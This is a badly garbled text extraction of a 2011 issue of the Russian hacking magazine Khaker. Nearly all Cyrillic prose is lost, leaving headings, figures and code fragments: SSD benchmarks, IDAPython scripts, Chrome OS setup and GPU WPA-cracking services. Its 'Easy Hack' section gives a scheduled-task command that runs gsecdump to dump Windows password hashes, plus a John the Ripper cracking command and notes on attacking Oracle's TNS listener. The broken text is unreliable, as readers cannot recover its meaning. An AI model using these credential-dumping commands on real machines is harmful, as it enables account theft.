Хакер 2011 02 PDF

.
120
x 02 (145) 2011
.
210
:

ONLINE
02 (145) 2011
MAC OS/
MAC OS
. 46
. 68
145

PHP
WHATHTML:
CRACKME

HACK IN THE BOX
IDA + PYTHON =

ACTIVE DIRECTORY
. 60
INTRO
,

,
. ,
,
-,

,
,
.
: ,
,
IT .
. 15

-,
300 . . ,
.
,
. ,
,
, .
,
.
:
-, ,

, -, -
. , . ,
, .

,
,
.
Skype, ,
, ,
-, p2p-,
opensource,
, YouTube
- .
,
,
.
,

:
, .
: TOR, VPN, SSL DHT
:).
nikitozz, .
CONTENT
MegaNews
004
076
FERRUM
012
SSD-
PC_ZONE
018
022
IDA + Python =
027
028
Google Chrome OS
Windows
- Google
032
Easy-Hack
036
042
WhatHTML
046
050
Welcome to Malaysia!
056
060
066
X-Tools
HITB -
080
086
092
MALWARE
068
073
Java
Mac? , !
Java-

GNU/Linux
097
099
Windows
102
PHP
Microsoft Detours
PHP+WMI
SYN/ACK
106
Drupal'
112
116
120
PHP
Python IDA?
-?
cloud- OpenStack:

124
FAQ UNITED
127
128
WWW2
FAQ
8.5
web-
046
068
Mac? ,
!
073
Java
Java-
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID
Andrushock
(andrushock@real.xakep.ru)
>

> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

>

/PUBLISHING
>
, 115280, , . ,19, , 5 , 21
.: +7 (495) 935-7034 : +7 (495) 545-0906
>

>

>.

>

>

>

>

>

>

>PR-

> GAMES & DIGITAL

>

>

> MAN TV

>
( )
(strekneva@gameland.ru)
>

>

>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)
>

>

/:
>
(kosheleva@gameland.ru)
>

>

>

> :
DVD-: claim@gameland.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999
>
101000, ,
, / 652,

,

77-11802 14.02.2002
Zapolex,
.
145 437 .

.

. ,
,
.

.
.

:
content@gameland.ru
, , 2011
MEGANEWS
Mifrill mifrill@real.xakep.ru
Meganews

, :
Google Nexus S
Google Android 2.3 . , HTC, Samsung.

Galaxy S.
Samsung Hummingbird, Cortex A8 1 , 512 16 - .
Nexus S 4- (480x800) Super
AMOLED
,
. ,
.

,
: Wi-Fi 802.11 n/b/g, Bluetooth 2.1+EDR
Near Field Communication (NFC).
, A-GPS,
, , ,
.
5- Nexus S 720x480,
. (640x480 ), ,
-. ,
1500
7 , 18 !
.
, Nexus S
Super clear LCD.
Galaxy S, 20-25
.
$529 ( ).
DDoS- Wikileaks 10 /.
208 :).

, CONFidence 2.0, ,
Elcomsoft -. ,
Canon Original Data Security. ,
Canon ,
. . , , .
Original Decision Data (ODD), EXIF JPG -
.
OSK-E3 (Canon Original Data Security Kit),
- . , GPS.
Canon ,
.
( iPhone ),
, . , , .
Canon,
EOS 5D Mark II.
(elcomsoft.com/canon.html?r1=pr&r2=canon).
,
.
004
X 02 (145) 2011
WINDOWS PHONE 7
Microsoft,
.
ChevronWP7,

(chevronwp7.com). ,
,
WP7 .
,
,
. ,

,
, Microsoft
Windows Phone 7 Marketplace $99,

.
ChevronWP7 .

.
Windows Phone 7 .
,

.
, , . , ChevronWP7,
, ,
. -
. , ,

ChevronWP7, .
2015 Intel, AMD, Dell, Lenovo, Samsung LG

VGA
LVDS. HDMI DisplayPort.

-
.
19-
.

,

. iTunes Amazon -
,
.
. 2008 2009
6.000 ,
2.000 .
500.000
( $750.000) .

80 ,
iTunes 99 .

,

, .

.
PLAYSTATION PHONE
:
Playstation Phone , , . PSP Go Android Zeus Z1,
Sony Ericsson. , , - ,
. ,
Nokia N-Gage
:). ,
.
Sony .
,
, : Zeus
Z1 PSP Go, 3.7,
1 , 512 , microSD-, 5- . ,
, Cebit 2011.
X 02 (145) 2011
005
MEGANEWS
BLACKHAT
16 19 ( ) BlackHat DC. ,

. , 1997 , 4
,
, :

. . ,
Digital Security
DSECRG, ][.
. :
, .
, - :
-,
,
. , .
DSECRG -. BlackHat
: Hack
In The Box, Source Barcelona, DEEPSEC, Confidence, Troopers.
:). - : , ,
,
.
ERP-.
,
blackhat.com/html/bh-dc-11/bh-dc-11briefings.html#Smith.
Wired , eBay
... .
eBay $8 .

?

, , ,
,
. Apen E FUN
APEN A2 .

. ,

.
100 .
Windows, Mac. , -
, Microsoft Office
Outlook.
$100.
006
X 02 (145) 2011

(Free Software Foundation),
, .

FSF GNU Savannah (savannah.gnu.org). Savane,
SQL- MySQL-
.
,
html- CVS-, gnu.org. , : php- - (
GNU GPL)
. FSF,
, ( ,
). Savannah,
GNU .
GNU Savannah . Crypt-MD5. ,
, , ,
, , .
Time Facebook
. ,

382 000 .
The Pirate Bay, , , ,

. , ,
,
(, ). ,
,
, . ,
, $6.5 .
, , ,
.
, , , .
,
.
DNS, p2p. ,
ICANN.
, ,
.
IRC- dns-p2p Efnet,
dot-p2p.org.
, ,
. , ICANN
, IP-.
, ,
, .
AdaptiveMobile, 2010 ,
Android-, 4 , iPhone
2 .
X 02 (145) 2011
007
MEGANEWS
3D
3D-, , .
.
EIZO 3D-. DuraVision FDF2301-3D
, - ,
, , .
23- .
, Full HD
(1920x1080), -, . ,
: 16 :). ,
, 3D-
. :
EIZO ( -
, ). , ,
,
, .
, ,
3D, .
DVI-D VESA Stereo Sync,

.
: EIZO
. .

,
. , ,
. Word Lens
iPhone , . . : iPhone
(, ), ,
. ,
! , ,
questvisual.com. , , ,
, iTunes $4.99.
, Word Lens
- - .
,
, .
460 2010 ,
, .

ZeuS
, . F-Secure
,
. CPU
2 , ,
, .
, IBM T42 ( 1.86
) ,
008
:). ,
(, )
.
,

.

.
,
. , ,

,
.
,
, .
, (
) .
X 02 (145) 2011
Avira , 9000
25% ,
.
GOOGLE

FACEBOOK

Google. ,

.

. Google ,
,
, ,

. ,

,
,
.

.
. , ,
. , Google -
, ,

. ,

, .

, ,
Facebook .
:

.
, Hacker Cup
2011 (facebook.com/hackercup)
, , .

20 10 (
). .
.
,
,
72
. , ,
.
300 ( Hacker Cup) 25 .
: $5000 , $2000 , $1000 $100 4-
25-. , , , Facebook -.
Google Chrome 800

13 , 4 .
Google $4000
.
- IPS-
,
,
Samsung.
,
Super PLS (Plane to
Line Switching),

IPS. Samsung ,

, Super
PLS. ,
X 02 (145) 2011
, Samsung
Mobile Display
10%
. SPLS-

WXGA (1366768 ).
, Super PLS
15% IPS.

, ,

2011-.
009
MEGANEWS
VISIONTEK
Killer
HD 5770 VisionTek.
PCI Express

, , ,
,
, .
.
VisionTek
Bigfoot Networks
Killer E2100.
Killer 2100 ,
. ,

: AMD Radeon HD 5770
DirectX 11,
(7.1)
HDMI.
$200. ,

PCI-E.
, , PCI-E SSD-. PCI-E
SSD-.
750
/c, 700 / !
YouTube .
, ,
YouTube 15 .
ACM ICPC
- (
, )

(ACM ICPC) - . ACM
ICPC
.

, ,
IT- , , .
-
1996-1997,
.

720
260 (, , , ,
).
,
,
.
: .

. ,

:). ,
,
.
C, C++ Java -
.
, ,

, .

( ).
:

(
ACM ICPC , );
(

).
ICPC 2010-2011,
, NEERC 13
. ,

: icpc.baylor.
edu. ,
?

Patriot Memory
,
Supersonic,
USB 3.0. Patriot
.
70 100
/ ( 60 80
010
/). Patriot
.
-
- USB ,
USB 3.0
. .
, 32 64 ,
.
, , ,

2011.
X 02 (145) 2011
FACEBOOK

Facebook , ,
. ?
Facebook . ,
. Facebook
: ,
. , Facebook
. , , , . , , Facebook,
, . .

2010 23- . ,
,
10 ! , Mega-D,
.
,
, ,
. -
. 2009
: .
$459 000, . , , ,
, ,
, Docent.
Gmail, .
-,
.
, .
$250 000.
Google .
3
books.google.com/ebooks.
,
,
X 02 (145) 2011
.
,
,
.
, , ,

.
, Windows -
(
,
).
,
Trojan.Winlock.2477, 295
. ,
,
!
Trojan.Fakealert.19448,
,
. ,
:
.
011
FERRUM

SSD-
, ,
,
.
. SSD- :
, HDD .
SSD- , 1978 ,
StorageTrek. 1995 , MSystems, SSD- -.
, 2008 , Mtron Storage Technology, ,
SSD- 260 240 /
. SSD HDD? . , . SSD
, ,
. , SSD
.
. , , ,
. SSD-,
,
. , 128 512 , 1024
512 . , -
012
4 ,
512 . HDD.
, 75%
, . TRIM,
.
SSD , SandForce
DuraClass.
, SATA III.
,
.

, ,
, Crystal
DiskMark 2.2 PCMark Vantage. : 80%,
SSD .
X 02 /145/ 2011
: AMD PHENOM II X6 1090T (3,2 )

: ASUS M4A89GTD PRO
: KINGSTON DDR3-1333 KVR1333D3N9 4
: SAPPHIRE RADEON HD 5870 1
: ATX ENHANCE 600
: WINDOWS 7 HOME PREMIUM
ADATA S596
CORSAIR NOVA V128
INTEL X25-M G2
INTEL X25-M G2 X2 RAID 0
KINGSTON SSDNOW V+ 128
KINGSTON SSDNOW V+ 512
10000 .
12500 .
ADATA
S596
Corsair Nova
V128
: 250 /
: 180 /
: SATA II, USB 2.0
-: 128
: 128
: 270 /
: 195 /
: SATA II
-: 64
: 128
ADATA S596 USB-. , ,

:
, , .
, ,

USB. ,
TRIM.
, ADATA S596 ( , )
. ,
, .
Corsair , SSD- . ,
, Corsair Nova V128 .
Indilinx Barefoot.
, PCMark
Vantage . ,
TRIM , Corsair Nova V128
. -, , ,
3.5, ,
SSD-.
,
SSD- .
, 4 512 , ,
.
X 02 /145/ 2011
013
FERRUM
29000 .
14500 .
Intel
X25-M G2
Intel
X25-M G2 x2 RAID 0
: 250 /
: 70 /
: SATA II
-: 32
: 160
: 500 /
: 140 /
: SATA II x2
-: 32 x2
: 320
Intel , Intel X25-M G2

160 .
, , 3.5- ,
SSD Toolbox ,
. ,
, : ,
. ,
Intel X25-M G2, .
HDD, SSD , , ,
, , RAID-,
.
RAID- 0 Intel X25-M G2, .
512 .
, .
, Intel X25-M G2
.
014
. -,
320 ,
. . RAID 0 , , ,
.
, .
, , .
X 02 /145/ 2011
Kingston
ssdNOW V+
11000 .
Kingston
ssdNOW V+ 512
53000 .
: 230 /
: 180 /
: SATA II
-: 128
: 128
: 230 /
: 180 /
: SATA II
-: 128
: 512

, , ,
,
. , , , .
Kingston ssdNOW V+ .
SATA- molex-SATA,
,
USB. ,
.
, ,
.
, , ,
SSD- .
Kingston , .
,
, . ,
Kingston ssdNOW V+ :
, .
TRIM, Kingston ssdNOW V+ 128 .
, ,
,
3.5-. PCMark
Vantage .
4 .
,
,
. SSD- 128
Kingston .
Intel X25-M G2,

Kingston ssdNOW V+.

. z
SSD- ,
. X 02 /145/ 2011
015
FERRUM
PCMark, Windows Defender, /c

Kingston ssdNOW V+ 512 GB
Intel X25-M G2 160 Gb x2 RAID 0
Intel X25-M G2 160 Gb
Corsair V128 128 Gb
ADATA S596 128 Gb
PCMark, Windows Vista startup, /

Load
80%
Clean
50
100
150
200
250
300

Corsair V128 128 Gb
ADATA S596 128 Gb
Load
80%
Clean
200
400
Kingston
, Windows
PCMark, Windows Media Center, /
PCMark, Application loading, /

Corsair V128 128 Gb
ADATA S596 128 Gb
Load
80%
Clean
200
Corsair
400
CrystalDiskMark, Sequential read, /c

Corsair V128 128 Gb
ADATA S596 128 Gb

200
400
600
CrystalDiskMark, Random read 4KB, /c

Corsair V128 128 Gb
ADATA S596 128 Gb
10
20
016
100
200
300

Corsair V128 128 Gb
ADATA S596 128 Gb
Load
80%
Clean
50
100
150
200
250
CrystalDiskMark, Random write 4KB, /c

Load
80%
Clean
ADATA S592
Load
80%
Clean
CrystalDiskMark, Sequential write, /

Load
80%
Clean

Corsair V128 128 Gb
ADATA S596 128 Gb
30

Corsair V128 128 Gb
ADATA S596 128 Gb
Load
80%
Clean
10
20
30
40
50
60
70
Intel RAID
X 02 /145/ 2011
PC_ZONE
M0r1arty moriarty@front.ru, graum l.shigarevskiy@gmail.com
DVD
File: X.exe (2 of 2)
dvd
Speed: 363 KB/s
Status: Receiving...
Elapsed Time: 0:00:19
Remaining Time: 0:00:51
Current File:
4.388 KB of 22.959 KB (19%)
Overall Progress:
6.913 KB of 25.484 KB (27%)
Windows

, ,
, .
, ,
, , -
.

.
, - -
- ,
ERP-. ,
. ,
, . , ? ! :)
018
, : ? :
1. , .
2. , .
3. .
, . X 02 (145) 2011
Process Monitor
FileInfo Activex / OCX.
EXE/DLL
, (), (Named Pipes), , COM/ActiveX
. , , ( , ) Windows , IPC .
,
- ,
.
, ,
- NT Filemon NT
Regmon,
.

. , Process Monitor.

,
. : Show
Registry Activity Show File System Activity.
, ProcMon, ,
. ProcMon,
, (
), Process Name
Include SuperProg.exe, SuperProg.exe
. , Process Monitor
, . , ,
Process Monitor, .
. File -> Save.
Events to save Events displayed
using current filter( Also include profiling events
), Format Comma-Separated Values
(CSV). - Logfile.csv .
? :)
. , , ,
Perl- ( ). ,
Logfile.csv ( ).
parse.pl. log-
: file.log
, reg.log .
.
reg.log. , HKLM/Software
HKCR/Interface ,
X 02 (145) 2011
.pl -C
( UNICODE')
(
). . ,
-, , .
export.pl.
REG- (
) + subdir. Reg-, :
;
;
.
, ()
(DLL-, ),
. REG-, .
. subdir
:
subdir
C ( )
Program Files
,
C:\Program Files
( ). ,
. subdir
, , . , ,
.
. , ( set ).
, , ,
. ,
- , () .
Windows - SFC (System File Checker),
.
. ,
, .
COM-
(DllRegisterServer, ).
019
PC_ZONE
DELETE !
Perl UNICODE

, ,
UNICODE.
, .
, : regsvr32
component.dll, component.dll COM- (,
COM- exe-).
Total Commander , lister, COM/ActiveX.
- ,
. , BDE(Borland Database Engine) DataSource, .
,
( ). .
, . ,
COM- .
, ,
install.exe?
, ? - , OllyDbg.
DeviceIoControl ( ),

CreateFileA/CreateFileW. .
. <Ctrl+G>, CreateFileA <OK>.
.
<Shift+F4> Breakpoint Conditional
log. Expression DWORD
PTR DS:[ESP+4]
. Decode value of expression as Pointer
to ASCII string ( - Pointer to
UNICODE string). - <Log value of expression>
Always. . <OK>
.
, , , . OllyDbg (
<Ctrl+L>) ,
COND. ,
\\.\ , . WinObj
(, )
. Device\DevName.
WinObj ,
.
. %SystemRoot%\System32\Drivers.
UNICODE- (Device\DevName).
, .
,
020

.

( , ).
, , , . , , ,
: \HKEY_LOCAL_
MACHINE\System\CurrentControlSet\Services\__ Group ObjectName .
,
, , ,
.
, . 70-75% . - ? . .
. ,
( ExitProcess,
). - , . REG-. ,
-, . subdir
. ,
, , Access violation,
(
). , ,
: + + .
,
,
.
,
. ,
, .
Bdetest.exe BDE testBDE, -
.
: ,
BDE-, , .
.
IT , , , ,
. : ! ,
, ,
. z
X 02 (145) 2011
PC_ZONE
Ant antitster@gmail.com
IDA + Python =
Python
IDA?
IDA .
Hex-Ruby,
.
, .
, IDA 1 -,
. ,
, -. IDA
: (
www.openrce.org/
downloads/browse/IDA_Plugins), ,
IDC.
.
IDC
IDC , .

C,
.
IDA, :
022
auto.
,
.
: (integer),
(string) .
IDC C ,
.
C.
(+=, -=, *= ),
.
,
strcpy(), strcat() .
, .
, ,

.

X 02 (145) 2011
IDA Pro
IDA Plugin API
IDAPython Plugin
HTTP://WWW
links
Python
Interpreter

IDAPython:
hex-rays.com/idapro/
idapython_docs;
,
Appcall:
hexblog.com/?p=113.
Operating System
Python IDA
//
if (GetFunctionFlags(func) != -1)
{
Message("Function %s at 0x%x\n",
GetFunctionName(func), func);
//
//
for (ref=RfirstB(func);
ref != BADADDR;
ref=RnextB(func, ref))
{
Message(" called from %s(0x%x)\n",
GetFunctionName(ref), ref);
}
}
() LoadLibraryA
,
.

static. IDC ,
(.idc-).
, .
,
( IDC ).
, - ,
, . , , return.
, .

.

#include idc.idc
main.
,
,
, .
#include <idc.idc>
static main() {
auto ea, func, ref;
//
ea = ScreenEA();
// (SegStart)
// (SegEND)
for (func=SegStart(ea);
func != BADADDR && func < SegEnd(ea);
func=NextFunction(func))
{
//
X 02 (145) 2011
}
}
. ScreenEA()
,
, SegStart() SegEnd()
. ,
,
NextFunction(). , , , -1 (BADADDR).
GetFunctionFlags() , ( , -1). GetFunctionName()
. ,
RfirstB() RnextB().
.idc
.
File Script File... (
<Alt+F7>) . Output Window
:
Function
Function
called
Function
called
Function
INFO
info

Python
IDA

,

IPython (http://bit.ly/
rl4kK).
Python-,

, .
IDA 6.0 Pro (hexrays.com/products.
shtml)
,
.
5.0
,
.
start at 0x401000
sub_401060 at 0x401060
from start(0x401006)
sub_401090 at 0x401090
from sub_4010E0(0x401185)
sub_4010E0 at 0x4010e0
023
PC_ZONE
User Script
IDC Compatiblity
idautils
idaapi
_idaapi
Other Python Modules
IDAPython
IDA + Python = IDAPython
, IDAPython.
: IDA Python, ,

IDC.

Python. ,
IDA SDK,
,
IDC. (code.google.com/p/idapython)
IDA. plugins python
IDA. , Python.

IDAPython (, idapython-1.4.3_ida6.0_py2.6_win32.zip Python 2.6).
examples, , .
IDAPython :
idaapi, IDA API;
idc, IDC;
idautils, .
.
Python'
IDAPython. , ,

. idaapi.
from idaapi import *
#
ea = get_screen_ea()
#
seg = getseg(ea)
#
func = get_func(seg.startEA)
while func is not None and func.startEA < seg.endEA:
funcea = func.startEA
print "Function %s at 0x%x" %
(GetFunctionName(funcea), funcea)
ref = get_first_cref_to(funcea)
while ref != BADADDR:
print " called from %s(0x%x)" %
(get_func_name(ref), ref)
ref = get_next_cref_to(funcea, ref)
func = get_next_func(funcea)
, IDC-. ,
024

( Output Window
)
, :
, . idautils:
from idautils import *
ea = ScreenEA()
for funcea in Functions(SegStart(ea), SegEnd(ea)):
print "Function %s at 0x%x" %
(GetFunctionName(funcea), funcea)
for ref in CodeRefsTo(funcea, 1):
print " called from %s(0x%x)" %
(GetFunctionName(ref), ref)
- Python:
.
, .
-. , , IDA.
( IDC IDAPython).
- .
, IDA , .
, ,
.
, . , , API- ,
,
.
. PEB (Process Environment Block)
kernel32.dll
LoadLibrary GetProcAddress.
. GetProcAddress ,
, ,
. , . ,
,
.
,
,
.
Hello, world! MessageBox.
X 02 (145) 2011
.
Enums
: GetKernelAddress() kernel32.dll, CalcHash() , GetProcAddressEx() .
:
.........
int main()
{
HMODULE kernel32, user32;
// kernel32.dll
kernel32 = (HMODULE) GetKernelAddress();
// LoadLibraryA
tLoadLibraryA pLoadLibraryA = (tLoadLibraryA)
GetProcAddressEx( kernel32, 0xC8AC8026 );
// user32.dll
user32 = pLoadLibraryA("user32.dll");
// MessageBoxA user32.dll
tMessageBoxA pMessageBoxA = (tMessageBoxA)
GetProcAddressEx( user32, 0xABBC680D );
pMessageBoxA(0, "Hello, world!", 0, 0);
return 0;
}
..........
:
00401000
00401001
00401003
00401006
0040100B
0040100E
00401013
00401016
00401017
0040101C
0040101F
X 02 (145) 2011
push
mov
sub
call
mov
push
mov
push
call
add
mov
ebp
ebp, esp
esp, 10h
sub_401060 <--- GetKernel()
[ebp+var_8], eax
0C8AC8026h <--- LoadLibraryA
eax, [ebp+var_8]
eax
sub_4010E0
esp, 8
[ebp+var_4], eax

00401022
push
offset aUser32_dll ; "user32.dll"
00401027
call
[ebp+var_4]
0040102A
mov
[ebp+var_10], eax
0040102D
push
0ABBC680Dh <--- MessageBoxA
00401032
mov
ecx, [ebp+var_10]
00401035
push
ecx
00401036
call
sub_4010E0
0040103B
add
esp, 8
0040103E
mov
[ebp+var_C], eax
00401041
push
0
00401043
push
0
00401045
push
offset aHelloWorld
; "Hello world!"
0040104A
push
0
0040104C
call
[ebp+var_C]
0040104F
xor
eax, eax
00401051
mov
esp, ebp
00401053
pop
ebp
00401054
retn
, API- .
MessageBox call [ebp+var_C] ( 0040104C).

.
. ? ,
, ,
0040100E 0040102D .
, ?
, , call. ,
? - IDAPython.
, sub_401060
kernel32.dll. sub_4010E0,
025
PC_ZONE
calc_hash 9
( kernel32.dll),
.
.
:
. ,
. , IDA , , .
IDA Pro
. ,
.
, idaapi.get_debug_names().
fetch_debug_names,
(, , ):

hash_kernel32_LoadLibraryA Enums
, .
. call ( 00401185),
. ,
. calc_hash. , ,
(
) . , . -.
IDAPython ,
calc_hash
. :
calc_hash ;
;
calc_hash
;
.
, . calc_hash . ,
IDA ctypes:
# IDA
body = idaapi.get_func(idc.LocByName('calc_hash'))
# VirtualAlloc,
MEM_COMMIT, PAGE_EXECUTE_READWRITE (, )
calc_hash_ptr = windll.kernel32.VirtualAlloc(0,
len(body), 0x1000, 0x40)
#
memmove(calc_hash_ptr, body, len(body))
# CFUNCTYPE.
,

proto = CFUNCTYPE(c_uint32, c_char_p)
#
calc_hash = proto(calc_hash_ptr)
, Appcall .
Python>hex(Appcall.calc_hash("LoadLibraryA")&0xfffffff
f) 0x0C8AC8026L.
026
def fetch_debug_names():
ret = []
dn = idaapi.get_debug_names(idaapi.cvar.inf.minEA,
idaapi.cvar.inf.maxEA)
for addr in dn:
n = dn[addr]
i = n.find('_')
ret.append((addr, n[i+1:], n[:i]))
return ret
:
Modulename_ApiName.
_.
. . :
dn = fetch_debug_names()
cache = {}
for add, name, modname in dn:
hash = calc_hash(name)
if modname not in cache:
cache[modname] = []
cache[modname].append((name, hash, addr))
.
IDAPython , - ( ).
- Chooser2.
, .
,
. , Enums (). .
, :
push
....
call
3FC1BD8Dh
sub_4010E0
<m> ,
:
push
....
call
hash_kernel32_GetModuleHandleA
sub_4010E0
? !
, ,
. ,
, IDA.
, ,
.
,
. z
X 02 (145) 2011
PC_ZONE
Step twitter.com/stepah

-?
,
.

.
,

. :).
.
- ,
,

.
CAPTCHA, API,
,

1000 CAPTCHA = $1.

.
WPA Cracker (wpacracker.
com), ($17)
-
WPA-PSK
. ,
Wi-Fi (

,
WPA Handshake).
, , .

,
, , NVIDIA
CUDA ATI Stream GPU,

. WPA Cracker
400 CPU, 135
. 5 ,
20 .
,
.
.
X 02 (145) 2011

.
PR- Amazon
Web Services (aws.amazon.com),
,
,
, VPN-
(. PDF- ).
?
: AWS

(,
, )
.

,
, . , Amazon
API,

.
: ,
,

. ,
, . .

,
Cluster
GPU Instances. GPU- NVIDIA Tesla
Fermi M2050,
448 3 . ,

,
GPU? ,
,
: 22
, 2
, 1690 , 64- . ,

,
. ,
.
Cluster Instances
HVM CentOS 5.5,

CUDA ,
. AMI- ami-aa30c7c3 Cluster
GPU (cg1.4xlarge, 22GB). :

,
SSH
, CUDA. - CUDA-Multiforcer (
cryptohaze.com ) ,
, WPA/
WPA2-PSK Pyrit (code.google.com/p/
pyrit). , ,
.
bit.ly/ec2-gpu.

. ,
. .
, .
Amazon

Cluster GPU, . , .
$2.10 . z
WPA Cracker

027
PC_ZONE

GOOGLE
CHROME OS

Cr-48
Google Chrome OS
- Google
Google Chrome OS .
60 000 Cr-48
, .
. Google
, !
Google .
, . - ,
. , ,
, .
802.11b/g/n
3G. - -.
, . 1.7 ( ,
) 8
028
. Standby, , .
Google? -, HDD- flash-. -, Caps Lock
. -,
. , ? ,

: -!
, Cr-48
X 02 (145) 2011
HTTP://WWW
links

Chrome OS: www.
chromeossite.com;
Google:
www.osbygoogle.ru.
DVD
USB c Chromium OS
,
,
.

eBay. , , ,
Cr-48,
.

Google?
, , Google Chrome OS.

, -. ,
,
,
. -, . ?
! Google Docs. ? Google
Mail! IM-? Google Talk!
, -.
Chrome Web Store ( ). Google
,
Skype,
2003 , ,
.
. -.
Google Chrome,
,
,
(
HTML5 Flash).
,
. ,

Chrome
. ?
.

.

,
,
X 02 (145) 2011
( , ) ,

. , ,
: , JS- V8, 3D-. ,
.
Chrome
OS . , ,
, .
. ( Google Gears).
.
Chrome OS vs
Chromium OS
, Google Chrome OS
. , .
Chromium
OS. :
? ,
. Chrome OS , Chromium OS .
Google, open-source
. Chromium OS
,
. Chrome OS
OEM-.
:
.
: Chrome Google .

chromium.org/chromium-os, Chrome OS.
, make build.

Chromium OS. ,

dvd

Chrome OS
INFO
info

Google

Chrome OS,
,
,
,
Chrome OS
.
,
Chrome OS
,

Android.

Chrome OS
,

Android.
029
PC_ZONE
VMware Player

Hexxeh (chromeos.hexxeh.net). Flow
.
-, ,
. 2 usb.
Hexxeh Chromium OS:

VMWare-image VMware usb-image,

Chromium OS
Google ,
-, Chromium OS
Ubuntu. ,
.
:
1.
<Ctrl+Alt+T>
2. :
$ sudo mkdir -p /var/cache/apt/archives/partial
$ sudo mkdir -p /var/log/apt
3. rw:
$ sudo mount -o remount,rw /
4. sources.list:
$ echo "deb http://mirror.yandex.ru/ubuntu karmic
main restricted" | sudo tee -a /etc/apt/sources.
list
5. :
$ sudo apt-get update
6. .
030
Chromium Flow
.
300 .
,
VMware
VMware Player (vmware.com/products/player).
: (ChromeOS.vmx)
HDD (ChromeOS.vmdk). VMware
Player Open a Virtual Machine
vmx-.
Chromium OS. , .
: . ,
. ,
, , .
Google .
usb-
Hexxeh IMG tag.gz.
WinRAR 7-zip,
(>= 2 ). .
Image Writer for Windows (launchpad.net/win32image-writer), IMG-
, . ,
File error,
. .
IMG- . ,
usb- ,
.
, /. Chrome
Google-.
, Flow,
facepunch/facepunch. :).
Chrome ( ,
,
-).
,
. , ,
, , .
X 02 (145) 2011
- Chrome
.
<F8>, ( ). ,
<Ctrl+Alt+t> . ,
Chromium OS . wiki,
,
. ,
.
, Linux ,
Chrome OS Chrome Web Store (chrome.
Chrome OS
Cr-48, Google ,
, . ,
Caps Lock.
.
, Chrome OS .

, <F8>. :
<Shift>-<Esc> -
<Ctrl>-<Back>
<Ctrl>-<Forward>
<Ctrl>-<Next>
<Ctrl>-<Alt>-<t>
<Ctrl>-<Shift>-
X 02 (145) 2011
google.com/webstore).
Apple App Store, Android Market
: ,
.

.
, . , Google
, .
Googe . ,
. Mozilla
, (
, ). ,
.
( ),
Google ,
. .
Chrome OS,
, Chromium
OS , . ,
Google Chrome,
Chrome Web Store! z
031

GreenDog agrrrdog@gmail.com
Easy Hack
1
:
URL
#
foreach $ip(@ips){
#
$response= $browser->get($ip);
:
! . , - url /. , -
. Perl , regexp :).
Perl
LWP, .
#!/usr/bin/perl
#
use LWP::UserAgent;
# url
$ip_file=$ARGV[0];
#
open(FILE,"$ip_file") or die "$ip_file not found";
while(<FILE>){
#
chomp($_);
push(@ips, $_);
}
close (FILE);
#
$browser = new LWP::UserAgent;
# 5
$browser->timeout(5);
#
if(!$response->is_success){
print "Error: ".$response->status_line."\r\n";
}
else {print "OK: ".$response->status_line. " \r\n ";}
}
. .
$response->status_line ,
. $response->content.
http-,
:
$browser->credentials(
$ip[$i].':80',
'Basic realm',
'username' => 'password'
);
: , (, ,
url ), .
: GET/POST , ,
http- . .
, ,
, PHP, Python, Perl, Ruby...
, .
, , , .
: METASPLOIT
FRAMEWORK -
:
Metasploit Framework :
, ,
MSF .
. MSF SVN
(Subversion). Subversion
, ( )
. SVN ,
http/https-. Metasploit
https-. ,
-.
032
Subversion
, , Win-, SVN *nix- :).
. SVN
.subversion.
X 02 /145/ 2011
server. , [global],
: , ,
( ), ,
SSL .
SVN- , .
, MSF. [groups]
:
MSF = *.metasploit.com
:
[MSF]
http-proxy-host = _
http-proxy-port = _
: MAC-.
:
,
48- MAC-, . 24 (,
22) .
,
. -
Nmap ( nmap-mac-prefixes),
. , Nmap, , , ain&Abel ( oui.txt)
.
OUI (Organizationally Unique Identifier) : standards.
ieee.org/develop/regauth/oui/oui.txt.
:
:)
,
( ), , , . ,
. ,
- . ,

, c .
,
. ,
.
: -
gsecdump fgdump, , :). ,
, pass the hash,
. . .
, LocalSystem.
X 02 /145/ 2011
, , .
MSF Windows-.
Metasploit Cygwin SVN , *nix-.
3.5 , Cygwin
.
Win- MSF PostgeSQL JAVA (
250 ).
Subversion.
__MSF\tools\svn. , , Subversion .
:).
SVN
Application Data .
: %APPDATA%\Subversion.
*nix-.
, OUI, .

. OUI
Nmap,

.
Organizationally Unique
Identifiers
, , .
NTLM-, , , . ,

.
. ,
, . ,
, . BIOS ,
, . , .
.
, . ,
Windows ( F8 ),
. :). ,
(
). , ,
System. ,
Windows.
: SAM, LSA . , :
SAM LM/NTLM ;
LSA LM/NTLM, ;
, .
033
NTLM-, Cain

SAM, , . , hashdump
MSF , .
LSA , .
. ,
, . .
,
NTLM- (DES).
:
1.
2.
3.
NTLM- ( DES);
Unicode;
, MD4.
034
,
. : openwall.info/wiki/john/
MSCash.
: fgdump , gsecdump
.
SAM.
System,
. Windows XP
:).
:
at 19:45 /INTERACTIVE cmd /c "c:\gsecdump.exe -a > c:\
hash.txt "
:
at ;
19:45 ;
X 02 /145/ 2011
/INTERACTIVE , ,
;
cmd /c "c:\gsecdump.exe -a > c:\hash.txt "
, gsecdump, , hash.txt.
, (Schedule service).
,
,
, /
.
, , ,
.
, , John The Ripper (openwall.
com/john) c jumbo (openwall.com/john/contrib/john-1.7.6jumbo-9-win32.zip), Cain&Abel (oxid.it/cain.html).
john.exe --format=mscash --wordlist=password_2.lst
fgdump.txt
--format=mscash , ;
--wordlist=password_2.lst - ( );
fgdump.txt .
: ORACLE
TNS-LISTENER.
fgdump.
Cain . -, , Cain
,
(security system). -, Cain , , fgdump. . .
, Cain cache.lst.
. fgdumpa.
, fgdumpa :
_ : : _ : __
Cain:
_ \t _ \t \t \t
\t .
,
. .
. , ,
. fgdump .
john. Cain -.
, , .
,
. -
Oracle, ,
:
:
/
Oracle TNS-listener
. 10-.
TNS listener Oracle'
.
1521 .
.
-, , -
status, services version, . , Oracle, SID
. -, ,
DoS'. TNS-listener,
set_log.
perl (jammed.com/~jwa/hacks/security/tnscmd), Metasploit (auxiliary\admin\oracle\tnscmd).
, :
